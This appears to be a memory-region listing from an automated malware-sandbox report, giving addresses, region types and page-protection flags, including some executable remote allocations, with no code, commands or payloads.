direct allocation
|
page read and write
|
||
|
68B0000
|
direct allocation
|
page read and write
|
||
|
89B9000
|
heap
|
page read and write
|
||
|
1F899776000
|
trusted library allocation
|
page read and write
|
||
|
8F10000
|
direct allocation
|
page read and write
|
||
|
20FE9106000
|
heap
|
page read and write
|
||
|
7D90000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C4FB3F000
|
stack
|
page read and write
|
||
|
1F896DF5000
|
heap
|
page read and write
|
||
|
1F896FC0000
|
heap
|
page read and write
|
||
|
B2148FE000
|
stack
|
page read and write
|
||
|
2C4FC3E000
|
stack
|
page read and write
|
||
|
20FE72AA000
|
heap
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page read and write
|
||
|
33F5000
|
heap
|
page read and write
|
||
|
20FE724D000
|
heap
|
page read and write
|
||
|
1F8989C9000
|
heap
|
page read and write
|
||
|
4FE0000
|
heap
|
page read and write
|
||
|
4FAE000
|
stack
|
page read and write
|
||
|
89EE000
|
heap
|
page read and write
|
||
|
75D0000
|
direct allocation
|
page read and write
|
||
|
352C000
|
heap
|
page read and write
|
||
|
7B40000
|
heap
|
page read and write
|
||
|
7DB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
20FE723F000
|
heap
|
page read and write
|
||
|
1F8989B5000
|
heap
|
page read and write
|
||
|
7FFD9B600000
|
trusted library allocation
|
page read and write
|
||
|
7810000
|
heap
|
page read and write
|
||
|
7A2E000
|
stack
|
page read and write
|
||
|
357A000
|
trusted library allocation
|
page execute and read and write
|
||
|
21A4D000
|
stack
|
page read and write
|
||
|
2C5068E000
|
stack
|
page read and write
|
||
|
8EF0000
|
trusted library allocation
|
page read and write
|
||
|
89D0000
|
heap
|
page read and write
|
||
|
736E000
|
stack
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
|
1F897020000
|
trusted library allocation
|
page read and write
|
||
|
1F896DC4000
|
heap
|
page read and write
|
||
|
7B8D000
|
heap
|
page read and write
|
||
|
2C4F1D3000
|
stack
|
page read and write
|
||
|
7D4E000
|
stack
|
page read and write
|
||
|
2C4F936000
|
stack
|
page read and write
|
||
|
20FE7274000
|
heap
|
page read and write
|
||
|
21B8E000
|
stack
|
page read and write
|
||
|
8A2A000
|
heap
|
page read and write
|
||
|
B2149FE000
|
stack
|
page read and write
|
||
|
7FFD9B8B0000
|
trusted library allocation
|
page read and write
|
||
|
742F000
|
stack
|
page read and write
|
||
|
20FE91D2000
|
heap
|
page read and write
|
||
|
7FFD9B7A0000
|
trusted library allocation
|
page read and write
|
||
|
8D2C000
|
stack
|
page read and write
|
||
|
1F8B1254000
|
heap
|
page read and write
|
||
|
7DF4589C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F89A914000
|
trusted library allocation
|
page read and write
|
||
|
1F8B121A000
|
heap
|
page read and write
|
||
|
6019000
|
trusted library allocation
|
page read and write
|
||
|
59D5000
|
remote allocation
|
page execute and read and write
|
||
|
1F896DEB000
|
heap
|
page read and write
|
||
|
2C4F47E000
|
stack
|
page read and write
|
||
|
3520000
|
heap
|
page read and write
|
||
|
20FE7300000
|
heap
|
page read and write
|
||
|
1F899089000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B800000
|
trusted library allocation
|
page read and write
|
||
|
7E30000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B6B6000
|
trusted library allocation
|
page read and write
|
||
|
4DAA000
|
remote allocation
|
page execute and read and write
|
||
|
1F89A936000
|
trusted library allocation
|
page read and write
|
||
|
1F8B1225000
|
heap
|
page read and write
|
||
|
662D000
|
heap
|
page read and write
|
||
|
3550000
|
trusted library allocation
|
page read and write
|
||
|
1F896D80000
|
heap
|
page read and write
|
||
|
1F89A967000
|
trusted library allocation
|
page read and write
|
||
|
35C2000
|
heap
|
page read and write
|
||
|
8970000
|
heap
|
page read and write
|
||
|
20FE75C5000
|
heap
|
page read and write
|
||
|
1F899016000
|
trusted library allocation
|
page read and write
|
||
|
21DC0000
|
remote allocation
|
page read and write
|
||
|
7FFD9B7BA000
|
trusted library allocation
|
page read and write
|
||
|
1F89901E000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B6BC000
|
trusted library allocation
|
page execute and read and write
|
||
|
21CB0000
|
heap
|
page read and write
|
||
|
7FFD9B7E7000
|
trusted library allocation
|
page read and write
|
||
|
20FE913C000
|
heap
|
page read and write
|
||
|
1F8988C0000
|
heap
|
page execute and read and write
|
||
|
33EE000
|
stack
|
page read and write
|
||
|
20FE91F3000
|
heap
|
page read and write
|
||
|
20FE91D7000
|
heap
|
page read and write
|
||
|
7FFD9B8D0000
|
trusted library allocation
|
page read and write
|
||
|
1F8B12BB000
|
heap
|
page read and write
|
||
|
999A000
|
direct allocation
|
page execute and read and write
|
||
|
1F8991C4000
|
trusted library allocation
|
page read and write
|
||
|
358D000
|
heap
|
page read and write
|
||
|
1F8B11AC000
|
heap
|
page read and write
|
||
|
2C4F8BF000
|
stack
|
page read and write
|
||
|
323C000
|
stack
|
page read and write
|
||
|
9850000
|
direct allocation
|
page execute and read and write
|
||
|
366A000
|
heap
|
page read and write
|
||
|
2C4F9BB000
|
stack
|
page read and write
|
||
|
4FF1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
20FE7238000
|
heap
|
page read and write
|
||
|
3553000
|
trusted library allocation
|
page execute and read and write
|
||
|
3570000
|
trusted library allocation
|
page read and write
|
||
|
7DC0000
|
trusted library allocation
|
page read and write
|
||
|
20FE91FF000
|
heap
|
page read and write
|
||
|
2C4F879000
|
stack
|
page read and write
|
||
|
1F8A8E7F000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B890000
|
trusted library allocation
|
page read and write
|
||
|
2C5070E000
|
stack
|
page read and write
|
||
|
1F896E07000
|
heap
|
page read and write
|
||
|
4FE9000
|
heap
|
page read and write
|
||
|
34EF000
|
stack
|
page read and write
|
||
|
20FE90F7000
|
heap
|
page read and write
|
||
|
1F896DAE000
|
heap
|
page read and write
|
||
|
7DA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
|
21ACD000
|
stack
|
page read and write
|
||
|
7E60000
|
trusted library allocation
|
page read and write
|
||
|
1F8B1207000
|
heap
|
page read and write
|
||
|
2C4F7FE000
|
stack
|
page read and write
|
||
|
65B0000
|
direct allocation
|
page read and write
|
||
|
8C15000
|
trusted library allocation
|
page read and write
|
||
|
8860000
|
trusted library allocation
|
page read and write
|
||
|
8E50000
|
trusted library allocation
|
page read and write
|
||
|
1F8B11D2000
|
heap
|
page read and write
|
||
|
21BCF000
|
stack
|
page read and write
|
||
|
20FE90DB000
|
heap
|
page read and write
|
||
|
8A1B000
|
heap
|
page read and write
|
||
|
20FE920F000
|
heap
|
page read and write
|
||
|
7BAC000
|
heap
|
page read and write
|
||
|
7FFD9B8A0000
|
trusted library allocation
|
page read and write
|
||
|
8E40000
|
trusted library allocation
|
page read and write
|
||
|
4EE0000
|
heap
|
page readonly
|
||
|
6666000
|
heap
|
page read and write
|
||
|
68D6000
|
heap
|
page read and write
|
||
|
8E20000
|
trusted library allocation
|
page read and write
|
||
|
2C4F6FE000
|
stack
|
page read and write
|
||
|
7E10000
|
trusted library allocation
|
page read and write
|
||
|
1F898850000
|
trusted library allocation
|
page read and write
|
||
|
2C5088B000
|
stack
|
page read and write
|
||
|
7C11000
|
heap
|
page read and write
|
||
|
1F8A8B91000
|
trusted library allocation
|
page read and write
|
||
|
21A0F000
|
stack
|
page read and write
|
||
|
21A8E000
|
stack
|
page read and write
|
||
|
20FE7282000
|
heap
|
page read and write
|
||
|
2C4FABE000
|
stack
|
page read and write
|
||
|
20FE7170000
|
heap
|
page read and write
|
||
|
21DC0000
|
remote allocation
|
page read and write
|
||
|
504D000
|
trusted library allocation
|
page read and write
|
||
|
7B9B000
|
heap
|
page read and write
|
||
|
1F8B0F27000
|
heap
|
page read and write
|
||
|
1F8A8E8E000
|
trusted library allocation
|
page read and write
|
||
|
21F60000
|
heap
|
page read and write
|
||
|
1F898DB8000
|
trusted library allocation
|
page read and write
|
||
|
5148000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
|
20FE8D80000
|
heap
|
page read and write
|
||
|
1F89904C000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
|
2C4F5FE000
|
stack
|
page read and write
|
||
|
20FE9106000
|
heap
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
|
1F8B10B0000
|
heap
|
page read and write
|
||
|
21DC0000
|
remote allocation
|
page read and write
|
||
|
7E50000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8C0000
|
trusted library allocation
|
page read and write
|
||
|
B2150FE000
|
stack
|
page read and write
|
||
|
3510000
|
trusted library section
|
page read and write
|
||
|
7FFD9B602000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B850000
|
trusted library allocation
|
page read and write
|
||
|
4F20000
|
heap
|
page execute and read and write
|
||
|
75C0000
|
direct allocation
|
page read and write
|
||
|
75F0000
|
direct allocation
|
page read and write
|
||
|
7FFD9B6C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7BFD000
|
heap
|
page read and write
|
||
|
7FFD9B6B0000
|
trusted library allocation
|
page read and write
|
||
|
8E0C000
|
stack
|
page read and write
|
||
|
B214BFF000
|
stack
|
page read and write
|
||
|
20FE72F9000
|
heap
|
page read and write
|
||
|
3569000
|
trusted library allocation
|
page read and write
|
||
|
3860000
|
remote allocation
|
page execute and read and write
|
||
|
63D5000
|
remote allocation
|
page execute and read and write
|
||
|
20FE9106000
|
heap
|
page read and write
|
||
|
1F89A9A4000
|
trusted library allocation
|
page read and write
|
||
|
7435000
|
heap
|
page execute and read and write
|
||
|
B2145BA000
|
stack
|
page read and write
|
||
|
20FE922C000
|
heap
|
page read and write
|
||
|
20FE91F3000
|
heap
|
page read and write
|
||
|
1AC000
|
stack
|
page read and write
|
||
|
20FE9238000
|
heap
|
page read and write
|
||
|
88CD000
|
stack
|
page read and write
|
||
|
34F0000
|
heap
|
page read and write
|
||
|
89A0000
|
trusted library allocation
|
page read and write
|
||
|
890F000
|
stack
|
page read and write
|
||
|
21EE0000
|
heap
|
page read and write
|
||
|
B214FFE000
|
stack
|
page read and write
|
||
|
20FE9226000
|
heap
|
page read and write
|
||
|
7F0D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F8B0F25000
|
heap
|
page read and write
|
||
|
20FE90E5000
|
heap
|
page read and write
|
||
|
C19A000
|
direct allocation
|
page execute and read and write
|
||
|
89B0000
|
heap
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
1F8B0ED5000
|
heap
|
page read and write
|
||
|
1F89908D000
|
trusted library allocation
|
page read and write
|
||
|
1F896E30000
|
heap
|
page read and write
|
||
|
21600000
|
direct allocation
|
page read and write
|
||
|
6666000
|
heap
|
page read and write
|
||
|
1F8A8BB1000
|
trusted library allocation
|
page read and write
|
||
|
1F896F90000
|
heap
|
page read and write
|
||
|
1F899036000
|
trusted library allocation
|
page read and write
|
||
|
20FE72E9000
|
heap
|
page read and write
|
||
|
79EE000
|
stack
|
page read and write
|
||
|
1F899737000
|
trusted library allocation
|
page read and write
|
||
|
1F89A9A9000
|
trusted library allocation
|
page read and write
|
||
|
20FE72EE000
|
heap
|
page read and write
|
||
|
7D0F000
|
stack
|
page read and write
|
||
|
4F10000
|
trusted library allocation
|
page execute and read and write
|
||
|
20FE91F3000
|
heap
|
page read and write
|
||
|
20FE9104000
|
heap
|
page read and write
|
||
|
652E000
|
unkown
|
page read and write
|
||
|
1F898820000
|
trusted library allocation
|
page read and write
|
||
|
AD9A000
|
direct allocation
|
page execute and read and write
|
||
|
1F8B12A6000
|
heap
|
page read and write
|
||
|
4EF8000
|
trusted library allocation
|
page read and write
|
||
|
68D0000
|
heap
|
page read and write
|
||
|
20FE90D6000
|
heap
|
page read and write
|
||
|
65C0000
|
direct allocation
|
page read and write
|
||
|
3440000
|
heap
|
page read and write
|
||
|
1F8B0ED0000
|
heap
|
page read and write
|
||
|
1F896DE7000
|
heap
|
page read and write
|
||
|
6645000
|
heap
|
page read and write
|
||
|
75A0000
|
direct allocation
|
page read and write
|
||
|
7C58000
|
trusted library allocation
|
page read and write
|
||
|
3560000
|
trusted library allocation
|
page read and write
|
||
|
66A0000
|
heap
|
page read and write
|
||
|
20FE72F8000
|
heap
|
page read and write
|
||
|
1F896F70000
|
heap
|
page read and write
|
||
|
8980000
|
trusted library allocation
|
page read and write
|
||
|
6663000
|
heap
|
page read and write
|
||
|
7FFD9B720000
|
trusted library allocation
|
page execute and read and write
|
||
|
20FE7219000
|
heap
|
page read and write
|
||
|
2350000
|
heap
|
page readonly
|
||
|
7CCE000
|
stack
|
page read and write
|
||
|
20FE91E0000
|
heap
|
page read and write
|
||
|
2C5080B000
|
stack
|
page read and write
|
||
|
20FE9104000
|
heap
|
page read and write
|
||
|
89E6000
|
heap
|
page read and write
|
||
|
A39A000
|
direct allocation
|
page execute and read and write
|
||
|
7BF8000
|
heap
|
page read and write
|
||
|
1F89A9FA000
|
trusted library allocation
|
page read and write
|
||
|
8E10000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C4FBBE000
|
stack
|
page read and write
|
||
|
20FE90E0000
|
heap
|
page read and write
|
||
|
3621000
|
heap
|
page read and write
|
||
|
7FFD9B7F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F899013000
|
trusted library allocation
|
page read and write
|
||
|
20FE90D8000
|
heap
|
page read and write
|
||
|
2390000
|
heap
|
page read and write
|
||
|
20FE72F6000
|
heap
|
page read and write
|
||
|
20FE913F000
|
heap
|
page read and write
|
||
|
7B59000
|
heap
|
page read and write
|
||
|
4E8E000
|
stack
|
page read and write
|
||
|
20FE90D0000
|
heap
|
page read and write
|
||
|
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
|
74BE000
|
stack
|
page read and write
|
||
|
20FE72E9000
|
heap
|
page read and write
|
||
|
33F0000
|
heap
|
page read and write
|
||
|
1F8A8BA0000
|
trusted library allocation
|
page read and write
|
||
|
1F8B11A4000
|
heap
|
page read and write
|
||
|
2C4F77E000
|
stack
|
page read and write
|
||
|
65E0000
|
heap
|
page read and write
|
||
|
20FE72F8000
|
heap
|
page read and write
|
||
|
7650000
|
direct allocation
|
page read and write
|
||
|
7C50000
|
trusted library allocation
|
page read and write
|
||
|
1F896E37000
|
heap
|
page read and write
|
||
|
1F898B30000
|
heap
|
page read and write
|
||
|
1F89A927000
|
trusted library allocation
|
page read and write
|
||
|
7BEE000
|
heap
|
page read and write
|
||
|
3633000
|
heap
|
page read and write
|
||
|
7610000
|
direct allocation
|
page read and write
|
||
|
1EB000
|
stack
|
page read and write
|
||
|
8920000
|
heap
|
page read and write
|
||
|
4E40000
|
trusted library allocation
|
page read and write
|
||
|
7DD0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7E5000
|
trusted library allocation
|
page read and write
|
||
|
20FE90E8000
|
heap
|
page read and write
|
||
|
7FFD9B8E0000
|
trusted library allocation
|
page read and write
|
||
|
1F8B1194000
|
heap
|
page read and write
|
||
|
7430000
|
heap
|
page execute and read and write
|
||
|
3540000
|
trusted library allocation
|
page read and write
|
||
|
1F8989B0000
|
heap
|
page read and write
|
||
|
747E000
|
stack
|
page read and write
|
||
|
1F8B1087000
|
heap
|
page execute and read and write
|
||
|
7B49000
|
heap
|
page read and write
|
||
|
8E30000
|
trusted library allocation
|
page read and write
|
||
|
1F897030000
|
heap
|
page readonly
|
||
|
75E0000
|
direct allocation
|
page read and write
|
||
|
21C1D000
|
stack
|
page read and write
|
||
|
35B6000
|
heap
|
page read and write
|
||
|
1F89AAC2000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
|
366C000
|
heap
|
page read and write
|
||
|
1F897040000
|
trusted library allocation
|
page read and write
|
||
|
1F897075000
|
heap
|
page read and write
|
||
|
8910000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F897000000
|
trusted library allocation
|
page read and write
|
||
|
2C4F57E000
|
stack
|
page read and write
|
||
|
7A52000
|
heap
|
page read and write
|
||
|
20FE723F000
|
heap
|
page read and write
|
||
|
2C4F4FE000
|
stack
|
page read and write
|
||
|
1F899768000
|
trusted library allocation
|
page read and write
|
||
|
7620000
|
direct allocation
|
page read and write
|
||
|
219CE000
|
stack
|
page read and write
|
||
|
7C80000
|
heap
|
page execute and read and write
|
||
|
1F8B0FA9000
|
heap
|
page read and write
|
||
|
4F6C000
|
stack
|
page read and write
|
||
|
20FE7180000
|
heap
|
page read and write
|
||
|
7D8D000
|
stack
|
page read and write
|
||
|
20FE90D1000
|
heap
|
page read and write
|
||
|
7FFD9B60D000
|
trusted library allocation
|
page execute and read and write
|
||
|
21E8C000
|
stack
|
page read and write
|
||
|
32D0000
|
heap
|
page read and write
|
||
|
1F899026000
|
trusted library allocation
|
page read and write
|
||
|
1F8B1190000
|
heap
|
page read and write
|
||
|
6651000
|
heap
|
page read and write
|
||
|
7E70000
|
trusted library allocation
|
page read and write
|
||
|
343E000
|
stack
|
page read and write
|
||
|
20FE7274000
|
heap
|
page read and write
|
||
|
1F898AD0000
|
heap
|
page execute and read and write
|
||
|
1F89ABB4000
|
trusted library allocation
|
page read and write
|
||
|
1F8B1282000
|
heap
|
page read and write
|
||
|
6890000
|
direct allocation
|
page read and write
|
||
|
B214CFF000
|
stack
|
page read and write
|
||
|
1F896DE9000
|
heap
|
page read and write
|
||
|
1F89A176000
|
trusted library allocation
|
page read and write
|
||
|
1F8B1198000
|
heap
|
page read and write
|
||
|
20FE72F8000
|
heap
|
page read and write
|
||
|
5FFB000
|
trusted library allocation
|
page read and write
|
||
|
1F899750000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B603000
|
trusted library allocation
|
page execute and read and write
|
||
|
2360000
|
heap
|
page read and write
|
||
|
20FE913C000
|
heap
|
page read and write
|
||
|
7EBB000
|
stack
|
page read and write
|
||
|
23F0000
|
direct allocation
|
page read and write
|
||
|
20FE9224000
|
heap
|
page read and write
|
||
|
8960000
|
trusted library allocation
|
page read and write
|
||
|
7590000
|
direct allocation
|
page read and write
|
||
|
B214EFE000
|
stack
|
page read and write
|
||
|
20FE90F4000
|
heap
|
page read and write
|
||
|
4FB0000
|
trusted library allocation
|
page read and write
|
||
|
7E00000
|
trusted library allocation
|
page read and write
|
||
|
1F8B0F77000
|
heap
|
page read and write
|
||
|
1F899022000
|
trusted library allocation
|
page read and write
|
||
|
8C40000
|
trusted library allocation
|
page read and write
|
||
|
1F8B126C000
|
heap
|
page read and write
|
||
|
7C70000
|
trusted library allocation
|
page read and write
|
||
|
21ECB000
|
stack
|
page read and write
|
||
|
2C4FCBB000
|
stack
|
page read and write
|
||
|
21E3F000
|
stack
|
page read and write
|
||
|
73EE000
|
stack
|
page read and write
|
||
|
7FFD9B7C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F897070000
|
heap
|
page read and write
|
||
|
8930000
|
trusted library allocation
|
page read and write
|
||
|
20FE72F7000
|
heap
|
page read and write
|
||
|
8F80000
|
trusted library allocation
|
page execute and read and write
|
||
|
8990000
|
trusted library allocation
|
page read and write
|
||
|
23EE000
|
unkown
|
page read and write
|
||
|
89E2000
|
heap
|
page read and write
|
||
|
7FFD9B820000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
|
20FE72E9000
|
heap
|
page read and write
|
||
|
4E20000
|
trusted library allocation
|
page read and write
|
||
|
5FF1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B610000
|
trusted library allocation
|
page read and write
|
||
|
20FE7239000
|
heap
|
page read and write
|
||
|
7E40000
|
trusted library allocation
|
page read and write
|
||
|
3554000
|
trusted library allocation
|
page read and write
|
||
|
20FE7210000
|
heap
|
page read and write
|
||
|
20FE72F8000
|
heap
|
page read and write
|
||
|
3530000
|
trusted library section
|
page read and write
|
||
|
6666000
|
heap
|
page read and write
|
||
|
7FFD9B7B1000
|
trusted library allocation
|
page read and write
|
||
|
20FE91D4000
|
heap
|
page read and write
|
||
|
1F896E97000
|
heap
|
page read and write
|
||
|
1F898C15000
|
trusted library allocation
|
page read and write
|
||
|
8D70000
|
heap
|
page read and write
|
||
|
6870000
|
direct allocation
|
page read and write
|
||
|
7FFD9B840000
|
trusted library allocation
|
page read and write
|
||
|
33F9000
|
heap
|
page read and write
|
||
|
1F8B1090000
|
heap
|
page read and write
|
||
|
7FFD9B61B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B870000
|
trusted library allocation
|
page read and write
|
||
|
20FE913C000
|
heap
|
page read and write
|
||
|
1F8B127E000
|
heap
|
page read and write
|
||
|
73AE000
|
stack
|
page read and write
|
||
|
20FE920F000
|
heap
|
page read and write
|
||
|
7FFD9B6E6000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F896DA0000
|
heap
|
page read and write
|
||
|
8F00000
|
direct allocation
|
page read and write
|
||
|
7FFD9B7E2000
|
trusted library allocation
|
page read and write
|
||
|
8850000
|
trusted library allocation
|
page read and write
|
||
|
8847000
|
stack
|
page read and write
|
||
|
3278000
|
stack
|
page read and write
|
||
|
21610000
|
direct allocation
|
page read and write
|
||
|
7B5F000
|
heap
|
page read and write
|
||
|
7FFD9B604000
|
trusted library allocation
|
page read and write
|
||
|
1F8B1080000
|
heap
|
page execute and read and write
|
There are 480 hidden memdumps, click here to show them.